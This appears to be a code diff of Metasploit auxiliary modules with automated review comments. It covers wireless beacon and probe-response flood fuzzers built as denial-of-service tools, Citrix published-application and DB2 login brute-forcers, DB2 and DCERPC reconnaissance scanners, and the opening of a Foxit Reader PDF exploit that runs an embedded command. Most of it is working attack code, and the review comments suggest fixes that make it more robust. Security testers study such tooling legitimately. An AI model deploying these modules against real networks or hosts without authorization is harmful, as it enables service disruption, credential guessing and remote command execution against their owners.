0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")
|
||||
end
|
||||
end
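Review bot: The `if(not @banner)` check after the connection test interpolates `last_str.unpack("H*")[0]` without the `if(last_str)` guard that the `if(not @connected)` branch just above it has, so a target that accepts the TCP connection but sends no banner on the very first iteration (while `last_str` is still nil) kills `run` with NoMethodError instead of reporting the condition. Mirror the branch above: wrap the crash message in `if(last_str)` and print a plain "no banner received" status otherwise. The 16 bytes following the `0x14` message type in `make_kex_init` (`0xff, 0x9f, 0xde, …`) appear to be a constant KEXINIT cookie, which is fine for a replayable fuzz run but deserves a one-line comment saying it is intentionally fixed.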
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Beacon Frame Fuzzer',
|
||||
'Description' => %q{
|
||||
This module sends out corrupted beacon frames.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def ping_check
|
||||
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
srand(0)
|
||||
|
||||
|
||||
@@uni = 0
|
||||
|
||||
|
||||
frames = []
|
||||
|
||||
|
||||
open_wifi
|
||||
|
||||
|
||||
print_status("Sending corrupt frames...")
|
||||
|
||||
|
||||
while (true)
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
if (datastore['PING_HOST'])
|
||||
|
||||
|
||||
if (frames.length >= 5)
|
||||
frames.shift
|
||||
frames.push(frame)
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
frames.push(frame)
|
||||
end
|
||||
|
||||
1.upto(3) do
|
||||
1.upto(3) do
|
||||
wifi.write(frame)
|
||||
if (not ping_check())
|
||||
frames.each do |f|
|
||||
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status f.inspect
|
||||
end
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
else
|
||||
wifi.write(frame)
|
||||
end
|
||||
end
|
||||
@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
#"\x00\x05" + # capability flags
|
||||
Rex::Text.rand_text(2) +
|
||||
|
||||
Rex::Text.rand_text(2) +
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
d = Rex::Text.rand_text(l)
|
||||
frame += t.chr + l.chr + d
|
||||
end
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Probe Response Frame Fuzzer',
|
||||
'Description' => %q{
|
||||
This module sends out corrupted probe response frames.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def ping_check
|
||||
@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
|
||||
|
||||
srand(0)
|
||||
|
||||
|
||||
@@uni = 0
|
||||
|
||||
|
||||
frames = []
|
||||
|
||||
|
||||
open_wifi
|
||||
|
||||
|
||||
print_status("Sending corrupt frames...")
|
||||
|
||||
|
||||
while (true)
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
if (datastore['PING_HOST'])
|
||||
|
||||
|
||||
if (frames.length >= 5)
|
||||
frames.shift
|
||||
frames.push(frame)
|
||||
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
frames.push(frame)
|
||||
end
|
||||
|
||||
1.upto(10) do
|
||||
1.upto(10) do
|
||||
wifi.write(frame)
|
||||
if (not ping_check())
|
||||
frames.each do |f|
|
||||
@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status f.inspect
|
||||
end
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
else
|
||||
wifi.write(frame)
|
||||
end
|
||||
end
|
||||
@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) # capability flags
|
||||
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
|
||||
|
||||
# ssid tag
|
||||
frame << "\x00" + ssid.length.chr + ssid
|
||||
|
||||
# supported rates
|
||||
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
|
||||
|
||||
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
|
||||
|
||||
# current channel
|
||||
frame << "\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
1.upto(ies) do |i|
|
||||
max = mtu - frame.length
|
||||
break if max < 2
|
||||
@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
d = Rex::Text.rand_text(l)
|
||||
frame += t.chr + l.chr + d
|
||||
end
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
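Review bot: `srand(0)` at the top of `run` pins the PRNG to a constant seed, so every invocation of this module emits the same sequence of frames (bssid, seq, the random IEs and, presumably, the `Rex::Text.rand_text*` output all derive from it), which is good for replaying a crash but means repeated runs never explore new input; the seed should be explicit, e.g. `OptInt.new('SEED', [ false, "PRNG seed; leave unset for a fresh sequence each run" ])` registered alongside `ADDR_DST`, and `srand(datastore['SEED']) if datastore['SEED']` in place of the hard-coded call. `@@uni = 0` is a class variable shared across the whole inheritance tree and nothing in the visible hunks reads it, so if it is per-run state an instance variable is the safer home. `while (true)` is conventionally written `loop do`. The body of `run` continues outside the `@ -71,7 +71,7` hunk.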
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
|
||||
]
|
||||
))
|
||||
@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
connect_udp
|
||||
|
||||
|
||||
print_status("Attempting to contact Citrix ICA service...")
|
||||
|
||||
client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
udp_sock.put(client_connect)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,server_response.length] == server_response)
|
||||
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")
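Review bot: `res = udp_sock.get(3)` followed by `res[0,server_response.length]` has no nil guard, so if `get` returns nil when the server stays silent for the three seconds the slice raises NoMethodError instead of reaching the "did not respond" path; `if (res and res[0,server_response.length] == server_response)` keeps the comparison safe. The same pattern appears in the following Citrix section at its detection check and at both `res[0,application_valid.length]` / `res[0,application_invalid.length]` comparisons inside the per-application loop, where a single missed datagram would abort the whole brute-force pass. `server_response` is defined outside this hunk and `run` continues past it.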
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '50617' ],
|
||||
[ 'BID', '5817' ],
|
||||
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
|
||||
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
connect_udp
|
||||
|
||||
|
||||
print_status("Attempting to contact Citrix ICA service...")
|
||||
|
||||
client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:)
|
||||
@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application
|
||||
application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published
|
||||
|
||||
|
||||
udp_sock.put(client_connect)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,server_response.length] == server_response)
|
||||
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
|
||||
|
||||
@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00"
|
||||
packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00"
|
||||
packet << client + "\x00"
|
||||
|
||||
|
||||
udp_sock.put(packet)
|
||||
res = udp_sock.get(3)
|
||||
|
||||
|
||||
if (res[0,application_valid.length] == application_valid)
|
||||
print_status("Found: #{application}")
|
||||
end
|
||||
|
||||
|
||||
if (res[0,application_invalid.length] == application_invalid)
|
||||
print_error("NOT Found: #{application}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
else
|
||||
print_error("Server did not respond.")
|
||||
end
|
||||
|
@ -1,9 +1,13 @@
|
||||
###
|
||||
## This file is part of the Metasploit Framework and may be subject to
|
||||
## redistribution and commercial restrictions. Please see the Metasploit
|
||||
## Framework web site for more information on licensing and terms of use.
|
||||
## http://metasploit.com/framework/
|
||||
###
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'zlib'
|
||||
@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Foxit Reader Authorization Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits a authorization bypass vulnerability in Foxit Reader
|
||||
build 1120. When a attacker creates a specially crafted pdf file containing
|
||||
a Open/Execute action, arbitrary commands can be executed without confirmation
|
||||
from the victim.
|
||||
build 1120. When a attacker creates a specially crafted pdf file containing
|
||||
a Open/Execute action, arbitrary commands can be executed without confirmation
|
||||
from the victim.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
|
||||
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0836' ],
|
||||
[ 'BID', '34035' ],
|
||||
@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DisclosureDate' => 'Mar 9 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# Create the pdf
|
||||
pdf = make_pdf(exec)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ioDef(id)
|
||||
"%d 0 obj" % id
|
||||
end
|
||||
@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def ioRef(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(exec)
|
||||
|
||||
xref = []
|
||||
eol = "\x0d\x0a"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
|
||||
# Randomize PDF version?
|
||||
pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
|
||||
pdf << "%" << RandomNonASCIIString(4) << eol
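Review bot: The helper names `ioDef`, `ioRef` and `RandomNonASCIIString` do not follow Ruby's snake_case convention for methods, and `RandomNonASCIIString(4)` reads as a constant lookup at the call site; `io_def`, `io_ref` and `random_non_ascii_string` would match the rest of the framework's style, with the call in `make_pdf` updated accordingly. `"%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol` relies on `%` binding tighter than `<<`, which is correct but worth a short comment such as `# format first, then append eol` since it is easy to misread. `make_pdf` continues outside the hunk.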
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -14,12 +14,12 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::DB2
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Authentication Brute Force Utility',
|
||||
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => ['todb'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
|
||||
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
|
||||
File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
info = db2_check_login
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
|
||||
vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
|
||||
return :abort
|
||||
rescue ::Rex::Proto::DRDA::RespError => e
|
||||
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
|
||||
vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
|
||||
return :abort
|
||||
end
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::DB2
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Probe Utility',
|
||||
@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run_host(ip)
|
||||
verbose = datastore['VERBOSE']
|
||||
begin
|
||||
|
||||
|
||||
info = db2_probe(2)
|
||||
if info[:excsatrd]
|
||||
inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth]
|
||||
report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}"
|
||||
print_status("#{ip}:#{rport} DB2 - #{report_info}")
|
||||
report_service(
|
||||
:host => rhost,
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:name => "db2",
|
||||
:info => report_info
|
||||
)
|
||||
end
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
|
||||
print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose
|
||||
return :done
|
||||
rescue ::Rex::Proto::DRDA::RespError => e
|
||||
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
|
||||
print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose
|
||||
return :error
|
||||
end
|
||||
end
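Review bot: The two `print_error(...) if verbose` lines in the rescue branches reimplement what `vprint_error` already does, and the sibling DB2 auth-brute section in this same commit uses `vprint_error` for the identical "Unable to attempt"/"Error in connecting" messages; `vprint_error("#{rhost}:#{rport} : Unable to attempt probe")` and `vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")` make the two modules consistent. With that change the `verbose = datastore['VERBOSE']` local at the top of `run_host` has no remaining reader in the method and can go. The whole `run_host` body is within this hunk.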
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
@ -8,11 +12,11 @@
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Exploit::Remote::Udp
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'DB2 Discovery Service Detection.',
|
||||
@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
register_options([Opt::RPORT(523),], self.class)
|
||||
|
||||
deregister_options('RHOST')
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00"
|
||||
|
||||
begin
|
||||
@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
connect_udp
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
|
||||
res = udp_sock.read(1024).split(/\x00/)
|
||||
|
||||
|
||||
if (res)
|
||||
report_note(
|
||||
:host => ip,
|
||||
@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
disconnect_udp
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Errno::EPIPE
|
||||
rescue ::Errno::EPIPE
|
||||
|
||||
end
|
||||
end
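Review bot: `res = udp_sock.read(1024).split(/\x00/)` makes the `if (res)` guard below it unreachable in the false case, because `String#split` always returns an Array (possibly empty), and if `read` returns nil when nothing arrives the `.split` raises NoMethodError before the guard is reached. Splitting the read from the parse fixes both: `data = udp_sock.read(1024)`, `res = data.to_s.split(/\x00/)`, and `if (!res.empty?)`. The empty `rescue ::Rex::ConnectionError` and `rescue ::Errno::EPIPE` branches at the end of the method swallow the failure silently; a `vprint_error("#{ip}:#{rport} : #{$!.class}")` in each would keep default output quiet while leaving the cause visible under VERBOSE. The `report_note` call's remaining arguments are outside the hunk.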
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Hidden DCERPC Service Discovery',
|
||||
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Description' => %q{
|
||||
This module will query the endpoint mapper and make a list
|
||||
of all ncacn_tcp RPC services. It will then connect to each of
|
||||
these services and use the management API to list all other
|
||||
these services and use the management API to list all other
|
||||
RPC services accessible on this port. Any RPC service found attached
|
||||
to a TCP port, but not listed in the endpoint mapper, will be displayed
|
||||
and analyzed to see whether anonymous access is permitted.
|
||||
@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
deregister_options('RHOST', 'RPORT')
|
||||
end
|
||||
|
||||
# Obtain information about a single host
|
||||
def run_host(ip)
|
||||
def run_host(ip)
|
||||
begin
|
||||
|
||||
epm = dcerpc_endpoint_list()
|
||||
@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Could not contact the endpoint mapper on #{ip}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
eports = {}
|
||||
|
||||
|
||||
epm.each do |ep|
|
||||
next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp")
|
||||
eports[ep[:port]] ||= {}
|
||||
eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true
|
||||
end
|
||||
|
||||
|
||||
eports.each_pair do |eport, servs|
|
||||
|
||||
|
||||
rport = eport
|
||||
print_status("Looking for services on #{ip}:#{rport}...")
|
||||
|
||||
|
||||
ids = dcerpc_mgmt_inq_if_ids(rport)
|
||||
return if not ids
|
||||
|
||||
|
||||
ids.each do |id|
|
||||
if (not servs.has_key?(id[0]+'_'+id[1]))
|
||||
print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}")
|
||||
|
||||
|
||||
conn = nil
|
||||
bind = nil
|
||||
call = nil
|
||||
@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
res = dcerpc.call(0, NDR.long(0) * 128)
|
||||
call = true
|
||||
|
||||
|
||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||
data = dcerpc.last_response.stub_data
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
error = e.to_s
|
||||
end
|
||||
|
||||
|
||||
if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/)
|
||||
call = true
|
||||
end
|
||||
|
||||
|
||||
status = "\t\t"
|
||||
status << "CONN " if conn
|
||||
status << "BIND " if bind
|
||||
status << "CALL " if call
|
||||
status << "DATA=#{data.unpack("H*")[0]} " if data
|
||||
status << "ERROR=#{error} " if error
|
||||
|
||||
|
||||
print_status(status)
|
||||
print_status("")
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_status("Error: #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
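Review bot: `return if not ids` sits inside the `eports.each_pair do |eport, servs|` loop, so the first endpoint-mapper port that yields no interface ids ends `run_host` for the whole host and the remaining TCP ports are never examined; `next if not ids` is the intended control flow. Separately, both `rescue ::Exception => e` clauses (the inner one after the management call and the outer one at the end of `run_host`) still catch SystemExit, NoMemoryError and the like even with the `rescue ::Interrupt` re-raise above them; `rescue ::StandardError => e` (or a bare `rescue => e`) is the net that was meant. The following Remote Management Interface Discovery section has the same `rescue ::Exception => e` at the end of its `run_host`. The inner `begin` block starts outside the `@ -85,41 +85,41` hunk.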
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Remote Management Interface Discovery',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module can be used to obtain information from the Remote
|
||||
This module can be used to obtain information from the Remote
|
||||
Management Interface DCERPC service.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
deregister_options('RHOST')
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(135)
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Obtain information about a single host
|
||||
def run_host(ip)
|
||||
def run_host(ip)
|
||||
begin
|
||||
|
||||
ids = dcerpc_mgmt_inq_if_ids(rport)
|
||||
return if not ids
|
||||
ids.each do |id|
|
||||
print_status("UUID #{id[0]} v#{id[1]}")
|
||||
|
||||
|
||||
stats = dcerpc_mgmt_inq_if_stats(rport)
|
||||
print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats
